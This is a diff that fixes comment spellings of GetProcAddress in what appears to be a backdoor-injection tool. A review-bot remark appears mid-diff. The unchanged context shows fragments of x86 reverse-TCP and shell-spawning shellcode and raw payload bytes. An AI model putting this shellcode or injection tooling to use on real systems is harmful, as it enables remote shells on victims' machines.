diff --git a/asm/src/loadliba_reverse_tcp.asm b/asm/src/loadliba_reverse_tcp.asm
index 284135d..a4eafeb 100644
--- a/asm/src/loadliba_reverse_tcp.asm
+++ b/asm/src/loadliba_reverse_tcp.asm
@@ -90,7 +90,7 @@ try_connect:
 ;
 jnz short try_connect
 failure:
-; LoadLibA is in EBX and GetprocessAddress is in ESI
+; LoadLibA is in EBX and GetProcAddress is in ESI
 ; socket is in EDI MUST BE GOING OUT
 ; No need to exit.
 ;kernel32.dll!ExitProcess
diff --git a/asm/src/loadliba_shell.asm b/asm/src/loadliba_shell.asm
index c809767..92c728d 100644
--- a/asm/src/loadliba_shell.asm
+++ b/asm/src/loadliba_shell.asm
@@ -9,11 +9,11 @@
 ; Output: None.
 ; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
 ; Calling getprocaddress and loadlibraryA smashes the following regs: EAX, ECX, EDX, ESP
-; Coming in LoadLibA is in EBX and GetprocessAddress is in ESI
+; Coming in LoadLibA is in EBX and GetprocAddress is in ESI
 ; socket is in EDI coming in
 ;Do a loadlibA of kernel32
-;then getprocessaddress of 'CreateProcessA'
+;then getprocaddress of 'CreateProcessA'
 push 0x0
 push 0x32336c65 ; Push kernel32 on the stack
 push 0x6e72656b ; ...
@@ -26,7 +26,7 @@
 push 0x61657243 ; ...
 push esp ; Push a pointer to CreateProcessA string on the stack
 push eax ; Push handle for kernel32 on the stack
- call dword [esi] ; Call getprocessaddress | CreateProcessA address in EAX
+ call dword [esi] ; Call getprocaddress | CreateProcessA address in EAX
 xchg ebp, eax ; Put createprocessa in ebp
@@ -96,7 +96,7 @@ push_loop:
 ;
 call dword [ebx] ; handle for kernel32 now in eax
 ;loadLiba ebx, getprocaddr edi, PROCESS_INFORMATION Structure esi, kernel32 eax
- ; getprocessaddress of 'WaitForSingleObject'
+ ; getprocaddress of 'WaitForSingleObject'
 push 0x00746365 ; Push WaitForSingleObject
 push 0x6a624f65 ; ...
 push 0x6c676e69 ; ...
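Review bot: The corrected export name is still spelled three different ways after this commit: `GetProcAddress` in the loadliba_reverse_tcp.asm hunk, `GetprocAddress` in the `@@ -9,11` hunk here and in the `@@ -105,7` hunk of the same file, and lower-case `getprocaddress` in the `@@ -26,7` and `@@ -96,7` hunks and in the WinIntelPE32.py hunk. Since the purpose of the change is to name the Win32 export correctly, the comments should use the exported spelling consistently, e.g. `; Coming in LoadLibA is in EBX and GetProcAddress is in ESI` and `; Call GetProcAddress | CreateProcessA address in EAX`. The same applies to the `GetprocAddress (kernel32, WaitForSingleObject)` comment in the `@@ -105,7` hunk.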
@@ -105,7 +105,7 @@ push_loop:
 ;
 push esp ; Push pointer for WaitForSingleObject
 push eax ; Push handle for kernel32
 xchg eax, ebp ; mov kernel32 to ebp
-call dword [edi] ; GetprocessAddress (kernel32, WaitForSingleObject)
+call dword [edi] ; GetprocAddress (kernel32, WaitForSingleObject)
 xchg ebp, eax ; Push waitforsingleobject address in ebp and kernel32 to eax
 ;loadLiba ebx, getprocaddr edi, PROCESS_INFORMATION Structure esi, kernel32 eax, waitforsingleobject ebp
diff --git a/intel/WinIntelPE32.py b/intel/WinIntelPE32.py
index ac3d978..9e45e65 100644
--- a/intel/WinIntelPE32.py
+++ b/intel/WinIntelPE32.py
@@ -773,7 +773,7 @@ def iat_reverse_tcp_inline_threaded(self, flItms, CavesPicked={}):
 "\x68\x52\x74\x6c\x45" # RtlExitUserThread
 "\x54" # push esp
 "\x50" # push eax
-"\xff\x17" # call getprocessaddress
+"\xff\x17" # call getprocaddress
 "\x6a\x00" # push 0
 "\xff\xd0" # call eax
 )